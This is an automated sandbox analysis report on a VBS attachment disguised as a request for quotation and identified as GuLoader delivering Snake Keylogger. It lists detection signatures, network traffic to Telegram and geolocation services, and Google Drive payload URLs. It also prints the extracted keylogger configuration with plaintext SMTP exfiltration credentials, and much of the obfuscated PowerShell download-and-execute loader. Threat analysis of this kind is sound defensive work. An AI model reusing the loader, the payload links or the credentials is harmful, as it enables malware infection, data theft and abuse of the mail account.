Windows Analysis Report
詢價 (RFQ) -RFQ20241010.vbs

Overview

General Information

Sample name: 詢價 (RFQ) -RFQ20241010.vbs
renamed because original name is a hash value
Original sample name: (RFQ) -RFQ20241010.vbs
Analysis ID: 1530594
MD5: 1720cb49814844901b663405cb868b7d
SHA1: fcc41b466e5f919f302ab92bf5305b7ee3cce8b6
SHA256: 45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706
Tags: vbs, user-abuse_ch

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection

Source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hardware@esteem.com.my", "Password": "PI%m)}2pZn6r", "Host": "mail.esteem.com.my", "Port": "587", "Version": "4.4"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.5% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2
Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043F45Dh 8_2_0043F2C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043F45Dh 8_2_0043F4AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043FC19h 8_2_0043F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E0D0Dh 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E1697h 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E2C19h 8_2_265E2968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E2DC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE501h 8_2_265EE258
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE0A9h 8_2_265EDE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE959h 8_2_265EE6B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EF209h 8_2_265EEF60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EEDB1h 8_2_265EEB08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EF661h 8_2_265EF3B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 8_2_265E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EFAB9h 8_2_265EF810
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ED3A1h 8_2_265ED0F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ECF49h 8_2_265ECCA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ED7F9h 8_2_265ED550
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E310E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E2DC2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EDC51h 8_2_265ED9A8

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49981 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49975 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49969 -> 142.250.186.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49982 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 188.114.97.3:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Oct 2024 07:28:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsU
Source: wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310864022.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290273681.0000020B00C34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310645852.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabTL
Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eney
Source: wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bb5a376bb8
Source: powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026729180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.cu
Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIP
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIXR
Source: powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googhZ
Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/Z
Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download
Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/n
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/h
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2

System Summary

Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv 